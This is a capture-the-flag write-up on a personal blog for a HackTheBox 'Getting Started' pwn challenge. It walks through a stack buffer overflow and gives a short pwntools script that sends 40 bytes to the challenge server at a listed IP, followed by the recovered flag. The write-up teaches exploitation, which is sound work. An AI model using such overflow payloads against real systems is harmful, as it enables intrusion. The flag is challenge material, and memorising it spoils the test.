<!DOCTYPE html><html lang="en"> <head><!-- Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-PDSFLEY2WT"></script> <title>PWN - Getting Started</title><meta charset="UTF-8"><link rel="canonical" href="https://ilter.tech/posts/htb-pwn-getting-started/"><meta name="description" content="HacktheBox CTF - Cyber Apocalypse"><meta name="robots" content="index, follow"><meta property="og:title" content="PWN - Getting Started"><meta property="og:type" content="website"><meta property="og:image" content="/opengraph-image.jpg"><meta property="og:url" content="https://ilter.tech/posts/htb-pwn-getting-started/"><meta property="og:image:url" content="/opengraph-image.jpg"><meta property="og:image:alt" content="astro portfolio template image"><meta name="twitter:creator" content="@"><link rel="icon" href="/favicon.svg"><link rel="sitemap" href="/sitemap-index.xml"><meta content="width=device-width, initial-scale=1" name="viewport"><meta content="Astro v3.6.0" name="generator"><meta content="/opengraph-image.jpg" name="twitter:image"><meta content="summary_large_image" name="twitter:card"><meta content="PWN - Getting Started" name="twitter:title"><meta content="Personal portfolio of Ugur Ilter, a software engineer based in Turkey." name="twitter:description"><meta content="@" name="twitter:site"><link rel="stylesheet" href="/_astro/index.a5a40b1c.css" /><script type="module">const d={online:{mclass:"st-green",text:"online",cclass:"st-c-green",aniclass:"ani-bg-green"},offline:{mclass:"st-red",text:"offline",cclass:"st-c-red",aniclass:""},idle:{mclass:"st-orange",text:"idle",cclass:"st-c-orange",aniclass:"ani-bg-orange"},dnd:{mclass:"st-red",text:"DnD",cclass:"st-c-red",aniclass:"ani-bg-red"}};function l(e){const n=e.d.discord_status,s=document.getElementById("ani-circle"),a=d[n].aniclass??"";s.classList.remove("ani-bg-green","ani-bg-red","ani-bg-orange"),a!==""&&s.classList.add(a)}function r(e){const n=document.getElementById("listening");n.innerHTML=e.state+" - "+e.details}function g(e){const n=document.getElementById("playing");n.innerHTML=e.name}function m(e){const n=document.getElementById("working");n.innerHTML=e.state.split("Workspace: ")[1]+"<br/>"+e.details.split("Editing ")[1]}function u(e){const n=document.getElementById("st-tooltip");n.innerHTML=d[e].text??""}function c(){const e=document.getElementById("listening"),n=document.getElementById("playing"),s=document.getElementById("working");e.innerHTML="-",n.innerHTML="-",s.innerHTML="-"}function i(e){var n=JSON.parse(e);document.getElementById("profile-pic");const s=n.d.discord_status;u(s),l(n);const a=n.d.activities;c(),a.forEach(t=>{t.name==="YouTube Music"?r(t):t.name==="Visual Studio Code"?m(t):t.name&&!t.details&&g(t)})}document.addEventListener("DOMContentLoaded",function(){c();const e=new WebSocket("wss://api.lanyard.rest/socket");let n={subscribe_to_id:"144871706257784832"},s=new Map;e.onmessage=a=>{const t=JSON.parse(a.data);switch(t.op){case 1:{e.readyState==e.OPEN&&e.send(JSON.stringify({op:2,d:n})),setInterval(()=>{e.readyState==e.OPEN&&e.send(JSON.stringify({op:3}))},t.d.heartbeat_interval);break}case 0:switch(t.t){case"INIT_STATE":{s=new Map([[t.d.discord_user.id,t.d]]),i(a.data);break}case"PRESENCE_UPDATE":{s.set(t.d.discord_user.id,t.d),i(a.data);break}}}}});window.dataLayer=window.dataLayer||[];function o(){dataLayer.push(arguments)}o("js",new Date);o("config","G-PDSFLEY2WT");
</script></head><body class="mx-auto flex min-h-screen max-w-[1200px] flex-col gap-9 bg-neutral-950 px-10 py-8 text-sm text-neutral-400 md:gap-20 md:py-16"> <header class="z-40 flex w-full flex-col gap-2 md:flex-row md:justify-between"> <a href="mailto:ugur@ilter.tech" class="hover:text-neutral-100">ugur@ilter.tech</a> <nav role="navigation"> <ul role="list" class="flex flex-row gap-2"> <li> <a href="/" class="hover:text-neutral-100">Home</a> </li> <li>/</li> <li> <a href="/posts" class="hover:text-neutral-100">Posts</a> </li> <li>/</li> <li> <a href="/resume.pdf" class="hover:text-neutral-100">Resume</a> </li> </ul> </nav> </header> <div class="fixed z-0 h-[134px] w-[134px] lg:w-[300px] lg:h-[300px] rounded-full bg-orange-500 blur-[150px] md:blur-[350px] opacity-50 left-0 top-0"></div> <div class="fixed z-0 h-[134px] w-[134px] lg:w-[300px] lg:h-[300px] rounded-full bg-violet-500 blur-[150px] md:blur-[350px] opacity-50 right-0 bottom-0"></div>  <main class="post mx-auto flex w-full flex-col gap-4"> <header role="presentation"> <h1 class="text-md"> PWN - Getting Started - 21/03/2023 </h1> <p class="italic">HacktheBox CTF - Cyber Apocalypse</p> </header> <pre class="astro-code nord" style="background-color:#2e3440ff;color:#d8dee9ff; overflow-x: auto;" tabindex="0"><code><span class="line"><span>Getting Started</span></span>
<span class="line"><span>Get ready for the last guided challenge and your first real exploit.</span></span>
<span class="line"><span>It's time to show your hacking skills.</span></span>
<span class="line"><span></span></span>
<span class="line"><span>Points: 300</span></span>
<span class="line"><span>Difficulty: Very Easy</span></span></code></pre>
<p>In this challenge you are given a docker instance and also some files that you can download.
The archive consisted of 3 files (flag.txt, gs, wrapper.py) and a folder which had some linux shared objects for the binary to run.
Running the gs binary i was again welcomed by a wall of text.</p>
<pre class="astro-code nord" style="background-color:#2e3440ff;color:#d8dee9ff; overflow-x: auto;" tabindex="0"><code><span class="line"><span>➜  challenge ./gs</span></span>
<span class="line"><span></span></span>
<span class="line"><span>Stack frame layout</span></span>
<span class="line"><span></span></span>
<span class="line"><span>|      .      | &#x3C;- Higher addresses</span></span>
<span class="line"><span>|      .      |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             | &#x3C;- 64 bytes</span></span>
<span class="line"><span>| Return addr |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             | &#x3C;- 56 bytes</span></span>
<span class="line"><span>|     RBP     |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             | &#x3C;- 48 bytes</span></span>
<span class="line"><span>|   target    |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             | &#x3C;- 40 bytes</span></span>
<span class="line"><span>|  alignment  |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             | &#x3C;- 32 bytes</span></span>
<span class="line"><span>|  Buffer[31] |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|      .      |</span></span>
<span class="line"><span>|      .      |</span></span>
<span class="line"><span>|_____________|</span></span>
<span class="line"><span>|             |</span></span>
<span class="line"><span>|  Buffer[0]  |</span></span>
<span class="line"><span>|_____________| &#x3C;- Lower addresses</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>      [Addr]       |      [Value]</span></span>
<span class="line"><span>-------------------+-------------------</span></span>
<span class="line"><span>0x00007ffd0d8a47e0 | 0x0000000000000000 &#x3C;- Start of buffer</span></span>
<span class="line"><span>0x00007ffd0d8a47e8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f0 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a4800 | 0x6969696969696969 &#x3C;- Dummy value for alignment</span></span>
<span class="line"><span>0x00007ffd0d8a4808 | 0x00000000deadbeef &#x3C;- Target to change</span></span>
<span class="line"><span>0x00007ffd0d8a4810 | 0x000055c23668e800 &#x3C;- Saved rbp</span></span>
<span class="line"><span>0x00007ffd0d8a4818 | 0x00007f2a4388ec87 &#x3C;- Saved return address</span></span>
<span class="line"><span>0x00007ffd0d8a4820 | 0x0000000000000001</span></span>
<span class="line"><span>0x00007ffd0d8a4828 | 0x00007ffd0d8a48f8</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>After we insert 4 "A"s, (the hex representation of A is 0x41), the stack layout like this:</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>      [Addr]       |      [Value]</span></span>
<span class="line"><span>-------------------+-------------------</span></span>
<span class="line"><span>0x00007ffd0d8a47e0 | 0x0000000041414141 &#x3C;- Start of buffer</span></span>
<span class="line"><span>0x00007ffd0d8a47e8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f0 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a4800 | 0x6969696969696969 &#x3C;- Dummy value for alignment</span></span>
<span class="line"><span>0x00007ffd0d8a4808 | 0x00000000deadbeef &#x3C;- Target to change</span></span>
<span class="line"><span>0x00007ffd0d8a4810 | 0x000055c23668e800 &#x3C;- Saved rbp</span></span>
<span class="line"><span>0x00007ffd0d8a4818 | 0x00007f2a4388ec87 &#x3C;- Saved return address</span></span>
<span class="line"><span>0x00007ffd0d8a4820 | 0x0000000000000001</span></span>
<span class="line"><span>0x00007ffd0d8a4828 | 0x00007ffd0d8a48f8</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>After we insert 4 "B"s, (the hex representation of B is 0x42), the stack layout looks like this:</span></span>
<span class="line"><span></span></span>
<span class="line"><span></span></span>
<span class="line"><span>      [Addr]       |      [Value]</span></span>
<span class="line"><span>-------------------+-------------------</span></span>
<span class="line"><span>0x00007ffd0d8a47e0 | 0x4242424241414141 &#x3C;- Start of buffer</span></span>
<span class="line"><span>0x00007ffd0d8a47e8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f0 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a47f8 | 0x0000000000000000</span></span>
<span class="line"><span>0x00007ffd0d8a4800 | 0x6969696969696969 &#x3C;- Dummy value for alignment</span></span>
<span class="line"><span>0x00007ffd0d8a4808 | 0x00000000deadbeef &#x3C;- Target to change</span></span>
<span class="line"><span>0x00007ffd0d8a4810 | 0x000055c23668e800 &#x3C;- Saved rbp</span></span>
<span class="line"><span>0x00007ffd0d8a4818 | 0x00007f2a4388ec87 &#x3C;- Saved return address</span></span>
<span class="line"><span>0x00007ffd0d8a4820 | 0x0000000000000001</span></span>
<span class="line"><span>0x00007ffd0d8a4828 | 0x00007ffd0d8a48f8</span></span>
<span class="line"><span></span></span>
<span class="line"><span>◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉</span></span>
<span class="line"><span>◉                                                                                                 ◉</span></span>
<span class="line"><span>◉  Fill the 32-byte buffer, overwrite the alginment address and the "target's" 0xdeadbeef value.  ◉</span></span>
<span class="line"><span>◉                                                                                                 ◉</span></span>
<span class="line"><span>◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉◉</span></span>
<span class="line"><span></span></span>
<span class="line"><span>>></span></span></code></pre>
<p>In order to reach the flag you need to fill 32 + 8 = 40 bytes of data in to the buffer and overwrite the given target address which has ‘0xdeadbeef’ as a value in it.
But running this attack locally only gives you the fake flag which was put there for testing purposes. In order to acquire the real flag you need to run the attack on the docker instance. So i modified the given ‘wrapper.py’ python script. Using pwntools i successfully acquired the flag after sending 40 bytes of data to the docker instance.</p>
<pre class="astro-code nord" style="background-color:#2e3440ff;color:#d8dee9ff; overflow-x: auto;" tabindex="0"><code><span class="line"><span style="color:#616E88">#!/usr/bin/python3.8</span></span>
<span class="line"><span style="color:#81A1C1">from</span><span style="color:#D8DEE9FF"> pwn </span><span style="color:#81A1C1">import</span><span style="color:#81A1C1"> *</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># connection info</span></span>
<span class="line"><span style="color:#D8DEE9FF">IP   </span><span style="color:#81A1C1">=</span><span style="color:#ECEFF4"> '</span><span style="color:#A3BE8C">188.166.152.84</span><span style="color:#ECEFF4">'</span></span>
<span class="line"><span style="color:#D8DEE9FF">PORT </span><span style="color:#81A1C1">=</span><span style="color:#B48EAD"> 31791</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># start remote connection</span></span>
<span class="line"><span style="color:#D8DEE9FF">r </span><span style="color:#81A1C1">=</span><span style="color:#88C0D0"> remote</span><span style="color:#ECEFF4">(</span><span style="color:#D8DEE9FF">IP</span><span style="color:#ECEFF4">,</span><span style="color:#D8DEE9FF"> PORT</span><span style="color:#ECEFF4">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># craft payload</span></span>
<span class="line"><span style="color:#D8DEE9FF">payload </span><span style="color:#81A1C1">=</span><span style="color:#81A1C1"> b</span><span style="color:#ECEFF4">'</span><span style="color:#A3BE8C">A</span><span style="color:#ECEFF4">'</span><span style="color:#81A1C1"> *</span><span style="color:#B48EAD"> 40</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># wait until prompt</span></span>
<span class="line"><span style="color:#D8DEE9FF">r</span><span style="color:#ECEFF4">.</span><span style="color:#88C0D0">recvregex</span><span style="color:#ECEFF4">(</span><span style="color:#81A1C1">b</span><span style="color:#ECEFF4">'</span><span style="color:#A3BE8C">>></span><span style="color:#ECEFF4">'</span><span style="color:#ECEFF4">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># Send payload</span></span>
<span class="line"><span style="color:#D8DEE9FF">r</span><span style="color:#ECEFF4">.</span><span style="color:#88C0D0">sendline</span><span style="color:#ECEFF4">(</span><span style="color:#D8DEE9FF">payload</span><span style="color:#ECEFF4">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#616E88"># Read flag</span></span>
<span class="line"><span style="color:#88C0D0">success</span><span style="color:#ECEFF4">(</span><span style="color:#81A1C1">f</span><span style="color:#A3BE8C">'Flag --> </span><span style="color:#EBCB8B">{</span><span style="color:#D8DEE9FF">r</span><span style="color:#ECEFF4">.</span><span style="color:#88C0D0">recvline_contains</span><span style="color:#ECEFF4">(</span><span style="color:#81A1C1">b</span><span style="color:#ECEFF4">"</span><span style="color:#A3BE8C">HTB</span><span style="color:#ECEFF4">"</span><span style="color:#ECEFF4">).</span><span style="color:#88C0D0">strip</span><span style="color:#ECEFF4">().</span><span style="color:#88C0D0">decode</span><span style="color:#ECEFF4">()</span><span style="color:#EBCB8B">}</span><span style="color:#A3BE8C">'</span><span style="color:#ECEFF4">)</span></span></code></pre>
<p><img src="/images/htb/pwn/getting_started/flag.png" alt="HTB"></p>
<pre class="astro-code nord" style="background-color:#2e3440ff;color:#d8dee9ff; overflow-x: auto;" tabindex="0"><code><span class="line"><span>Flag: HTB{b0f_s33m5_3z_r1ght?}</span></span></code></pre> </main>    <link rel="stylesheet" href="https://rsms.me/inter/inter.css"> </body></html>